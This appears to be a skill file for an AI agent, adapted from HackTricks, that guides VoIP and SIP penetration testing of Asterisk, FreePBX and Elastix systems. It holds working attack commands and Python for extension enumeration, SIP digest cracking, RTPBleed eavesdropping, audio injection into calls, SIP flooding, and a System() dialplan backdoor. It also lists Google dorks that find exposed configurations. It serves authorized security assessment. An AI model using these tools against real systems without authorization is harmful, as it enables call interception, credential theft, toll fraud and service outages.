Hacktricks-skills voip-pentesting

Perform VoIP penetration testing including SIP enumeration, extension scanning, password cracking, vulnerability detection (SIPDigestLeak, RTPBleed), and attack testing. Use this skill whenever the user mentions VoIP, SIP, PBX, Asterisk, FreePBX, Elastix, phone systems, telephony security, or wants to test voice communication infrastructure for vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-voip/pentesting-voip/SKILL.MD
source content

VoIP Pentesting Skill

A comprehensive skill for conducting VoIP penetration testing assessments, from initial enumeration through exploitation and reporting.

When to Use This Skill

Use this skill when:

  • Testing VoIP infrastructure (SIP servers, PBX systems, IP phones)
  • Enumerating SIP services and extensions
  • Testing for VoIP-specific vulnerabilities (SIPDigestLeak, RTPBleed, misconfigurations)
  • Performing password attacks on VoIP systems
  • Analyzing captured VoIP traffic
  • Testing for free call vulnerabilities
  • Assessing Asterisk, FreePBX, Elastix, or similar PBX systems

Prerequisites

Before starting VoIP pentesting:

  1. Authorization: Ensure you have written permission to test the target systems
  2. Network Access: You need network access to the VoIP infrastructure
  3. Tools: Install required tools (see Tool Setup section)
  4. Target Information: Have target IP ranges, known extensions, or phone numbers

Tool Setup

Essential Tools

# SIPVicious suite (enumeration and attacks)
sudo apt install sipvicious

# SIPPTS (comprehensive SIP testing; a Python project, installed with pip)
git clone https://github.com/Pepelux/sippts
cd sippts && pip3 install .

# SIPCrack (offline password cracking)
sudo apt install sipcrack

# Additional tools
sudo apt install enumiax rtpinsertsound rtpmixsound

Optional Tools

# Wireshark for packet analysis
sudo apt install wireshark

# Metasploit (has SIP modules)
# Already included in Kali

# Multimon for DTMF extraction (current Kali/Debian package it as multimon-ng,
# and the binary is then called multimon-ng; older systems ship plain multimon)
sudo apt install multimon-ng

Phase 1: Reconnaissance and Enumeration

1.1 OSINT and Phone Number Discovery

Start by gathering information about the target's phone systems:

# Search for exposed phone numbers
# Use Google Dorks to find exposed VoIP configurations

# Grandstream phones
intitle:"Grandstream Device Configuration" Password

# Cisco CallManager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle:"FreePBX"

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

1.2 Network Service Discovery

Scan for VoIP services on the network:

# Nmap SIP scan (slow but thorough)
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

# SIPVicious svmap (faster, fingerprinting)
svmap 10.10.0.0/24 -p 5060-5070 --fp

# SIPPTS scan (fastest, multi-threaded)
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco

# Metasploit SIP scanner
use auxiliary/scanner/sip/options
set RHOSTS 10.10.0.0/24
run

1.3 Additional Service Discovery

PBX systems often expose other services alongside SIP:

Port       Service      Purpose
69/UDP     TFTP         Phone firmware and provisioning files (often downloadable without authentication and frequently containing SIP credentials)
80/443     HTTP/HTTPS   Web management (FreePBX, Elastix, phone web UIs)
389        LDAP         User/directory information
3306       MySQL        PBX database
5038       AMI          Asterisk Manager Interface
5222       XMPP         Jabber messaging
5432       PostgreSQL   PBX database

# Scan for additional services (TFTP is UDP, so a TCP-only scan misses it)
nmap -sU -sT -p U:69,T:80,443,389,3306,5038,5222,5432 10.10.0.10

1.4 SIP Methods Enumeration

Discover which SIP methods are supported:

sippts enumerate -i 10.10.0.10

1.5 Extension Enumeration

Find valid extensions on the PBX:

# SIPVicious svwar
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER

# SIPPTS exten
sippts exten -i 10.10.0.10 -r 5060 -e 100-200

# Metasploit
use auxiliary/scanner/sip/enumerator
set RHOSTS 10.10.0.10
set RPORT 5060
run

# EnumIAX for IAX protocol
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10
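The tools above all apply the same heuristic: send an unauthenticated REGISTER per extension and read the status code (a 401/407 challenge means the PBX knows the user, 404 means it does not). The following is an added example written for this page, not code from the hacktricks-skills project or from SIPVicious/SIPPTS; the target address, the spoofed User-Agent string and the extension range are assumptions.

```python
"""Extension enumeration over SIP REGISTER (the svwar / sippts exten heuristic).

Added example for this page, not code from the hacktricks-skills project.
The target address, local address, User-Agent and extension range are
assumptions chosen for illustration.
"""
import random
import socket
import string


def _tag(n=8):
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))


def build_register(host, port, ext, local_ip="10.10.0.99", local_port=5060):
    """Build an unauthenticated REGISTER for one extension (CRLF line endings)."""
    branch = "z9hG4bK" + _tag(10)
    lines = [
        f"REGISTER sip:{host}:{port} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_ip}:{local_port};branch={branch};rport",
        f"From: <sip:{ext}@{host}>;tag={_tag()}",
        f"To: <sip:{ext}@{host}>",
        f"Call-ID: {_tag(16)}@{local_ip}",
        "CSeq: 1 REGISTER",
        f"Contact: <sip:{ext}@{local_ip}:{local_port}>",
        "Max-Forwards: 70",
        "User-Agent: Grandstream GXP1625",  # assumption: look like a common desk phone
        "Expires: 60",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_status(response: bytes):
    """Return (code, reason) from the status line, or (None, '') if malformed."""
    first = response.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = first.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/2.0") or not parts[1].isdigit():
        return None, ""
    return int(parts[1]), parts[2] if len(parts) == 3 else ""


def classify(code):
    """Map a REGISTER reply to an enumeration verdict."""
    if code in (401, 407):
        return "exists"             # challenged: the PBX knows this user
    if code == 403:
        return "exists-forbidden"   # known user, REGISTER not permitted from here
    if code == 200:
        return "exists-noauth"      # registered without any password at all
    if code == 404:
        return "absent"
    return "unknown"


def probe(host, ext, port=5060, timeout=1.0):
    """Send one REGISTER and classify the reply (live network call)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_register(host, port, ext), (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return "timeout"
    code, _ = parse_status(data)
    return classify(code)


def enumerate_range(host, first, last, **kw):
    """Probe a numeric extension range and return {extension: verdict}."""
    return {e: probe(host, str(e), **kw) for e in range(first, last + 1)}


if __name__ == "__main__":
    for ext, verdict in enumerate_range("10.10.0.10", 100, 110).items():
        if verdict != "absent":
            print(ext, verdict)
```

Caveat: Asterisk's `alwaysauthreject=yes` (the default in current releases) answers 401 for every REGISTER, existing user or not, so the verdict collapses to "exists" for the whole range. When that happens, compare against INVITE or OPTIONS responses instead, or rely on credentials recovered elsewhere (TFTP provisioning files, captured traffic).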

Phase 2: Authentication Testing

2.1 Online Password Brute-Force

Test credentials against discovered extensions. Online attacks are noisy: Asterisk logs every failed REGISTER, and fail2ban (commonly deployed on FreePBX and Elastix) bans the source address after a handful of failures, so keep the wordlist short and the thread count low, or prefer the offline methods below.

# SIPVicious svcrack (single extension)
svcrack -u100 -d dictionary.txt udp://10.10.0.10:5060

# SIPPTS rcrack (multiple users)
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt

2.2 Offline Password Cracking

If you've captured SIP traffic with credentials:

# Extract credentials from pcap
sipdump -p capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

# Or with SIPPTS
sippts dump -f capture.pcap -o data.txt
sippts dcrack -f data.txt -w wordlist/rockyou.txt

2.3 SIP Digest Leak Exploitation

SIPDigestLeak targets the phone rather than the PBX. The tool calls the phone directly; once the call has been answered and hung up, the phone sends a BYE, and the tool answers that BYE with a 407 challenge carrying a nonce and realm of its own choosing. The phone then repeats the BYE with a Digest response computed from its real SIP password, which can be cracked offline. Point -i at a phone's address, not at the PBX:

sippts leak -i 10.10.0.10

# Output can be saved and cracked with:
sippts dcrack -f leak_output.txt -w wordlist/rockyou.txt
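Both the pcap-based cracking in 2.2 and the SIPDigestLeak output in 2.3 reduce to the same computation: the captured Authorization header contains everything except the password, so each wordlist candidate is hashed per RFC 2617/3261 and compared with the captured response. The block below is an added example written for this page, not code from sipcrack or SIPPTS; the challenge/response it parses is constructed here (the password used to build it is shown only so the example runs offline).

```python
"""Offline cracking of a SIP Digest response (what sipcrack / sippts dcrack do).

Added example for this page, not code from the hacktricks-skills project or
from the tools it lists. The sample header is constructed for the example.
"""
import hashlib
import re


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None, algorithm="MD5"):
    """RFC 2617 digest as used by SIP: HA1, HA2, then response (with/without qop)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    if algorithm.upper() == "MD5-SESS":
        ha1 = _md5(f"{ha1}:{nonce}:{cnonce}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(header: str) -> dict:
    """Parse 'Digest username="100", realm="asterisk", ...' into a dict."""
    scheme, _, params = header.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    return {m.group(1): (m.group(2) if m.group(2) is not None else m.group(3))
            for m in _PARAM.finditer(params)}


def crack(method, auth: dict, wordlist):
    """Return the candidate password that reproduces the captured response, or None."""
    for pw in wordlist:
        pw = pw.rstrip("\r\n")
        calc = digest_response(auth["username"], auth["realm"], pw, method,
                               auth["uri"], auth["nonce"], auth.get("qop"),
                               auth.get("nc"), auth.get("cnonce"),
                               auth.get("algorithm", "MD5"))
        if calc.lower() == auth["response"].lower():
            return pw
    return None


# Constructed sample: a BYE challenged with an attacker-chosen nonce (the
# SIPDigestLeak scenario). SAMPLE_PASSWORD exists only to build the sample.
SAMPLE_METHOD = "BYE"
SAMPLE_PASSWORD = "secret123"
SAMPLE_AUTH = (
    'Digest username="100", realm="asterisk", nonce="1a2b3c4d", '
    'uri="sip:100@10.10.0.10", algorithm=MD5, response="%s"'
    % digest_response("100", "asterisk", SAMPLE_PASSWORD,
                      SAMPLE_METHOD, "sip:100@10.10.0.10", "1a2b3c4d")
)
SAMPLE_WORDLIST = ["123456", "password", "asterisk", "secret123", "100"]


def demo():
    """Crack the constructed sample with the small constructed wordlist."""
    return crack(SAMPLE_METHOD, parse_authorization(SAMPLE_AUTH), SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The method matters: the response binds the request method into HA2, so a header captured from a BYE must be cracked as a BYE. When the phone uses qop=auth, the nc and cnonce values are in the same header and the qop branch is taken; the attacker-chosen nonce in the leak scenario gives no protection because the phone computes the hash with whatever nonce it is handed.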

Phase 3: Vulnerability Testing

3.1 Free Call Testing

Test whether the PBX routes an unauthenticated INVITE into the dialplan. A 401/407 challenge means credentials are enforced; 100 Trying followed by 180 Ringing, 183 Session Progress or 200 OK means the call is being placed without authentication (typically allowguest=yes in sip.conf, or a guest/default context that permits outbound dialing). The destination really is dialed, so use a number you control:

# Test unauthenticated INVITE
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v

# Test call transfer (once the call is established, the tool tries to transfer it to a second number)
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444

3.2 RTP Bleed Detection

RTPBleed affects media servers (Asterisk with nat=yes / rtp_symmetric=yes, for example) that learn the remote media endpoint from whichever packets arrive first on a media port: an attacker who sends RTP to an open media port receives the other party's audio. The -p value must fall inside the server's RTP range (10000-20000 by default in Asterisk's rtp.conf), and a probe only succeeds while a call is active on that port:

# Detection
sippts rtpbleed -i 10.10.0.10
sippts rtcpbleed -i 10.10.0.10

# Exploitation (if vulnerable)
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
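The detection logic is small once the RTP header is handled: send a few RTP packets of your own to each media port and, if the server answers with RTP whose SSRC is not the one you sent, a third party's stream is leaking to you. The block below is an added example written for this page, not code from SIPPTS or the hacktricks-skills project; the port range, SSRC and the sample packet are assumptions/constructed data.

```python
"""RTP header handling and the RTPBleed probe logic behind sippts rtpbleed.

Added example for this page, not code from sippts or the project the page
describes. The port range, SSRC and sample packets are constructed.
"""
import socket
import struct


def rtp_packet(seq, timestamp, ssrc, payload=b"\x00" * 160, pt=8, marker=0):
    """Minimal RTP packet: version 2, no padding/extension/CSRC, PCMA (pt=8) by default."""
    b0 = 0x80                               # V=2, P=0, X=0, CC=0
    b1 = (marker << 7) | (pt & 0x7F)
    header = struct.pack("!BBHII", b0, b1, seq & 0xFFFF,
                         timestamp & 0xFFFFFFFF, ssrc & 0xFFFFFFFF)
    return header + payload


def parse_rtp(data):
    """Return the header fields as a dict, or None if this is not RTP version 2."""
    if len(data) < 12 or (data[0] >> 6) != 2:
        return None
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", data[:12])
    cc = b0 & 0x0F
    hdr_len = 12 + 4 * cc                   # CSRC list follows the fixed header
    if len(data) < hdr_len:
        return None
    return {"pt": b1 & 0x7F, "marker": b1 >> 7, "seq": seq, "ts": ts,
            "ssrc": ssrc, "cc": cc, "payload": data[hdr_len:]}


def is_leaked_stream(sent_ssrc, received):
    """RTPBleed verdict: the server answered unsolicited RTP with a stream
    carrying somebody else's SSRC, i.e. another call's media."""
    pkt = parse_rtp(received)
    return pkt is not None and pkt["ssrc"] != sent_ssrc


def probe_port(host, port, ssrc=0x1BADB002, packets=3, timeout=0.5):
    """Send a few RTP packets to one media port and report a leak (live network call)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i in range(packets):
            s.sendto(rtp_packet(1000 + i, 160 * i, ssrc), (host, port))
        try:
            data, _ = s.recvfrom(2048)
        except socket.timeout:
            return False
    return is_leaked_stream(ssrc, data)


def scan(host, start=10000, end=20000, step=2):
    """Even ports carry RTP (odd ones RTCP); return the ports that leaked media."""
    return [p for p in range(start, end + 1, step) if probe_port(host, p)]


if __name__ == "__main__":
    print("leaking RTP ports:", scan("10.10.0.10"))
```

A timeout on every port is the normal result on a patched server or when no call is in progress; rerun the scan while a test call you control is active, and compare the leaked SSRC/payload type with what your own phone negotiated in SDP to confirm the audio belongs to another call.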

3.3 Server Response Analysis

Analyze server behavior with custom requests (the -fn/-tn pair sets the display names of the From and To headers):

sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -tn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp

# WebSocket testing (SIP over WSS, as used by WebRTC softphones)
sippts wssend -i 10.10.0.10 -r 443 -path /ws

Phase 4: Traffic Analysis

4.1 VoIP Sniffing

Capture and analyze VoIP traffic. SIP signalling alone is not enough to recover calls: the RTP ports are negotiated in SDP, so capture the media port range as well:

# Capture SIP signalling plus RTP media (adjust the range to the PBX's rtp.conf)
tcpdump -i eth0 -w voip_capture.pcap 'port 5060 or udp portrange 10000-20000'

# Extract SIP data (add -filter auth to keep only authentication exchanges)
sippts tshark -f voip_capture.pcap [-filter auth]

# Extract DTMF codes from recovered audio (the binary is multimon-ng on current systems)
multimon -a DTMF -t wac pin.wav

4.2 Manager Interface Testing

Test the Asterisk Manager Interface (AMI, port 5038). It is configured in manager.conf; FreePBX enables it and stores the admin secret there, so any file read (TFTP, web vulnerabilities) that reaches /etc/asterisk/manager.conf usually gives AMI access. Packets are CRLF-separated "Key: Value" lines terminated by a blank line; the credentials below are placeholders:

# Connect and query
exec 3<>/dev/tcp/10.10.0.10/5038
printf 'Action: Login\r\nUsername: test\r\nSecret: password\r\nEvents: off\r\n\r\nAction: Command\r\nCommand: sip show peers\r\n\r\nAction: Logoff\r\n\r\n' >&3
cat <&3
exec 3>&-
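The raw-socket one-liner above is hard to reuse; the same Login / Command / Logoff exchange as a small client, with the framing and response parsing done explicitly, is shown below. This is an added example written for this page, not code from the hacktricks-skills project or from Asterisk; the host, credentials and the server transcript it parses are constructed.

```python
"""Asterisk Manager Interface (AMI, TCP 5038) client with explicit framing.

Added example for this page, not code from the hacktricks-skills project.
Host, credentials and the sample server transcript are constructed.
"""
import socket


def build_action(action, **fields):
    """AMI packets are CRLF-separated 'Key: Value' lines ending with a blank line."""
    lines = [f"Action: {action}"] + [f"{k}: {v}" for k, v in fields.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_packets(data: bytes):
    """Split a raw AMI byte stream into one dict per packet.

    'Command' responses carry CLI text: older releases send it as free-form
    lines ending in --END COMMAND--, newer ones as repeated 'Output:' lines.
    Both are collected under a single 'Output' key.
    """
    packets = []
    for block in data.decode(errors="replace").split("\r\n\r\n"):
        if not block.strip():
            continue
        pkt, output = {}, []
        for line in block.split("\r\n"):
            key, sep, value = line.partition(": ")
            if key == "Output" and sep:
                output.append(value)                       # Asterisk >= 14 style
            elif sep and key.replace("-", "").isalnum() and not output:
                pkt[key] = value                           # ordinary header line
            elif line != "--END COMMAND--":
                output.append(line)                        # free-form CLI output
        if output:
            pkt["Output"] = "\n".join(output)
        packets.append(pkt)
    return packets


def login_ok(packets):
    """True when the first packet reports a successful Login."""
    return bool(packets) and packets[0].get("Response") == "Success"


def ami_session(host, username, secret, command, port=5038, timeout=5.0):
    """Login, run one CLI command, log off; return (banner, parsed packets).
    Live network call, not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)                    # "Asterisk Call Manager/x.y.z"
        s.sendall(build_action("Login", Username=username, Secret=secret, Events="off"))
        s.sendall(build_action("Command", Command=command))
        s.sendall(build_action("Logoff"))
        buf = b""
        while True:                              # server closes after Logoff
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return banner.decode(errors="replace").strip(), parse_packets(buf)


# Constructed transcript of a successful Login, a "sip show peers" reply and the Logoff.
SAMPLE_STREAM = (
    b"Response: Success\r\nMessage: Authentication accepted\r\n\r\n"
    b"Response: Follows\r\nPrivilege: Command\r\n"
    b"Name/username              Host            Dyn Forcerport ACL Port     Status\r\n"
    b"100/100                    10.10.0.20       D   Yes           5060     OK (12 ms)\r\n"
    b"--END COMMAND--\r\n\r\n"
    b"Response: Goodbye\r\nMessage: Thanks for all the fish.\r\n\r\n"
)


if __name__ == "__main__":
    for pkt in parse_packets(SAMPLE_STREAM):
        print(pkt)
```

The banner the server sends before any action identifies the AMI protocol version and is worth recording on its own; a "Response: Error" with "Authentication failed" on the first packet means the credentials were wrong, while a connection refused on 5038 usually means manager.conf has enabled=no or binds to 127.0.0.1 only.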

Phase 5: Advanced Attacks

5.1 RTP Injection

Inject audio into an active call. Both tools sniff the live RTP stream to learn its endpoints, sequence numbers and timestamps, so your host must already see the traffic (a mirrored port or an ARP-spoofing man-in-the-middle position). The arguments describe the stream's two endpoints rather than the PBX alone (10.10.0.20 is a placeholder for the phone), and the input file is typically an 8 kHz 16-bit mono WAV:

# Using rtpinsertsound (inserts the audio ahead of the real packets so the receiver drops them)
rtpinsertsound -i eth0 -a 10.10.0.20 -A 10070 -b 10.10.0.10 -B 10070 audio.wav

# Using rtpmixsound (mixes the audio into the existing stream)
rtpmixsound -i eth0 -a 10.10.0.20 -A 10070 -b 10.10.0.10 -B 10070 audio.wav

5.2 Denial of Service

Test system resilience. Flooding can take a production PBX down, so agree it explicitly in scope and schedule it outside business hours:

# SIP flood (INVITE flood)
sippts flood -i 10.10.0.10 -m invite -v

# SIP ping (response time; take a baseline before and after flooding)
sippts ping -i 10.10.0.10

# IAX flood: iaxflood <source> <destination> <packet count> (10.10.0.99 stands for your own address)
iaxflood 10.10.0.99 10.10.0.10 1000

5.3 Remote Code Execution

If you can modify the Asterisk configuration, the System() dialplan application runs arbitrary shell commands with the privileges of the Asterisk process:

# Add an extension that executes a script when dialed
# In extensions.conf (in a context reachable by an extension you control):
# exten => 100,1,System(/tmp/backdoor.sh)

# Reload the dialplan so the change takes effect
asterisk -rx "dialplan reload"

# Writing extensions.conf needs file write access: the FreePBX/Elastix web admin
# (custom-extension or config-editor modules), a file-write vulnerability, or
# an AMI user whose permissions allow the UpdateConfig action

Common Vulnerabilities Checklist

  • SIPDigestLeak: test phones with sippts leak
  • RTPBleed: test with sippts rtpbleed (and sippts rtcpbleed)
  • Free Calls: test with sippts invite
  • Extension Injection: test with malformed extension values
  • Weak Passwords: test with svcrack or sippts rcrack
  • Manager Interface: test port 5038 access
  • Web Interface: test for exposed admin panels
  • Context Misconfiguration: test for unrestricted dialing
  • IVR Bypass: test for input validation issues
  • Eavesdropping: test for ChanSpy/ExtenSpy exposure

Reporting

Document your findings with:

  1. Vulnerability Summary: List all discovered vulnerabilities
  2. Risk Assessment: Rate each finding (Critical/High/Medium/Low)
  3. Proof of Concept: Include command outputs and screenshots
  4. Remediation: Provide specific recommendations for each finding
  5. Evidence: Save PCAP files, logs, and test outputs

Safety and Ethics

⚠️ Important Reminders:

  1. Authorization: Only test systems you have explicit permission to test
  2. Scope: Stay within the agreed scope of testing
  3. Timing: Avoid testing during business hours if it could disrupt operations
  4. Data Handling: Securely handle any credentials or sensitive data discovered
  5. Documentation: Document all testing activities for audit purposes
  6. Legal Compliance: Ensure compliance with applicable laws and regulations

Quick Reference

SIP Response Codes

Code   Meaning
100    Trying
180    Ringing
200    OK
401    Unauthorized (authentication challenge from a registrar/UAS)
403    Forbidden
404    Not Found
407    Proxy Authentication Required (authentication challenge from a proxy)
408    Request Timeout
486    Busy Here
500    Internal Server Error
603    Decline

Common SIP Methods

Method      Purpose
REGISTER    Register a SIP user
INVITE      Initiate a call
ACK         Confirm receipt of a final INVITE response
BYE         End a call
OPTIONS     Query capabilities
CANCEL      Cancel a pending request
SUBSCRIBE   Subscribe to events
NOTIFY      Send notifications